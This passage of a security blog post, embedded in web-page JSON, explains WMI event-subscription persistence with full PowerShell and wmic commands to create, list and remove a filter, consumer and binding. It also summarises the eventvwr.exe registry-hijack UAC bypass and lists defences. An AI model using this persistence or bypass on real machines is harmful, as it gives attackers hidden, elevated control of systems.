src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019881652_9_a927c50e8a-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Check current processes\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_Process GET Caption \u002FFORMAT:list\u003C\u002Fp>\u003Ch2>0x05 WMI Persistence\u003C\u002Fh2>\u003Cp>The complete PowerShell implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$filterName = 'BotFilter82'\u003Cbr>$consumerName = 'BotConsumer23'\u003Cbr>$exePath = 'C:\\Windows\\System32\\notepad.exe'\u003Cbr>$Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003Cbr>$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace \"root\\subscription\" -Arguments @{Name=$filterName;EventNameSpace=\"root\\cimv2\";QueryLanguage=\"WQL\";Query=$Query} -ErrorAction Stop\u003Cbr>$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}\u003Cbr>Set-WmiInstance -Class __FilterToConsumerBinding -Namespace \"root\\subscription\" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Next, the corresponding WMIC invocation process is introduced step by step\u003C\u002Fp>\u003Ch3>1. Create an __EventFilter instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", EventNameSpace=\"root\\cimv2\",QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003C\u002Fp>\u003Ch3>2. Create an __EventConsumer instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer CREATE Name=\"BotConsumer23\", ExecutablePath=\"C:\\Windows\\System32\\notepad.exe\",CommandLineTemplate=\"C:\\Windows\\System32\\notepad.exe\"\u003C\u002Fp>\u003Ch3>3. Create a __FilterToConsumerBinding instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding CREATE Filter=\"__EventFilter.Name=\\\"BotFilter82\\\"\", Consumer=\"CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"\"\u003C\u002Fp>\u003Ch3>4. List the __EventFilter and __EventConsumer instances\u003C\u002Fh3>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>Code viewed via PowerShell:\u003C\u002Fp>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventFilter\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventConsumer\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding\u003C\u002Fp>\u003Ch3>5. Remove all instances\u003C\u002Fh3>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"BotFilter82\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"BotConsumer23\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE Filter=\"__EventFilter.Name='BotFilter82'\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In wmic Binding's Filter parameter \"BotFilter82\", the \" must be changed to '\u003C\u002Fp>\u003Cp>Implementation code for cleanup via PowerShell:\u003C\u002Fp>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventFilter -Filter \"Name='BotFilter82'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class CommandLineEventConsumer -Filter \"Name='BotConsumer23'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding -Filter \"__Path LIKE '%BotFilter82%'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Ch2>0x05 fileless UAC bypass using eventvwr.exe and registry hijacking\u003C\u002Fh2>\u003Cp>Some wmic operations require administrator privileges, here's a recently learned UAC bypass technique\u003C\u002Fp>\u003Cp>\u003Cstrong>fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>Learning link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fenigma0x3.net\u002F2016\u002F08\u002F15\u002Ffileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Author:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Matt Nelson @enigma0x3\u003C\u002Fp>\u003Ch3>Principle\u003C\u002Fh3>\u003Cp>When the process eventvwr.exe starts, it first looks for the registry location HKCU\\Software\\Classes\\mscfile\\shell\\open\\command. If this location is empty, it then looks for the registry location HKCR\\mscfile\\shell\\open\\command (whose default value is %SystemRoot%\\system32\\mmc.exe \"%1\" %*), launches mmc.exe with high privileges, and finally opens eventvwr.msc.\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019885508_10_13ecb422b5-1.jpeg\">\u003C\u002Fp>\u003Cp>Next, if a payload is added to the registry HKCU\\Software\\Classes\\mscfile\\shell\\open\\command, the preset payload can be executed before launching mmc.exe.\u003C\u002Fp>\u003Cp>\u003Cstrong>The most important point:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Modifying the key value of the registry HKCU\\Software\\Classes\\mscfile\\shell\\open\\command only requires standard user permissions.\u003C\u002Fp>\u003Ch3>Implementation\u003C\u002Fh3>\u003Cp>The author shared a PoC code implemented via PowerShell, with the link below:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fenigma0x3\u002FMisc-PowerShell-Stuff\u002Fblob\u002Fmaster\u002FInvoke-EventVwrBypass.ps1\u003C\u002Fp>\u003Cp>If the PoC executes successfully, it will write \"Is Elevated: True\" under C:\\UACBypassTest.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>By default, operations on files in the c:\\ directory will be blocked by UAC.\u003C\u002Fp>\u003Cp>I forked the author's code and made slight modifications, running the following command:\u003C\u002Fp>\u003Cp>C:\\Windows\\System32\\cmd.exe \u002Fc copy c:\\test\\1.txt c:\\1.txt\u003C\u002Fp>\u003Cp>Address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch3>Advantages\u003C\u002Fh3>\u003Cp>This method differs significantly from conventional approaches, with the following advantages:\u003C\u002Fp>\u003Cul>\u003Cli>Fileless\u003C\u002Fli>\u003Cli>No process injection required\u003C\u002Fli>\u003Cli>No need to copy privileged files\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Applicable Environments\u003C\u002Fh3>\u003Cp>Windows 7\u003C\u002Fp>\u003Cp>Windows 8.1\u003C\u002Fp>\u003Cp>Windows 10\u003C\u002Fp>\u003Ch3>Defense\u003C\u002Fh3>\u003Cul>\u003Cli>set the UAC level to \"Always Notify\"\u003C\u002Fli>\u003Cli>remove the current user from the Local Administrators group\u003C\u002Fli>\u003Cli>alert on new registry entries in HKCU\\Software\\Classes\\\u003C\u002Fli>\u003C\u002Ful>\u003C\u002Fbody>\u003C\u002Fhtml>",1602,"Onedaysec",5,"published","2026-02-02T08:19:47.663Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"WMI Persistence Techniques Using wmic.exe for System Security","WMI persistence, wmic.exe, Windows Management Instrumentation, registry operations, system security, attack techniques, information gathering, PowerShell, cmd commands",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,47,4],156,155,154,153,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.062Z","2026-07-23T16:01:05.298Z","draft","2026-07-23T16:04:02.906Z"]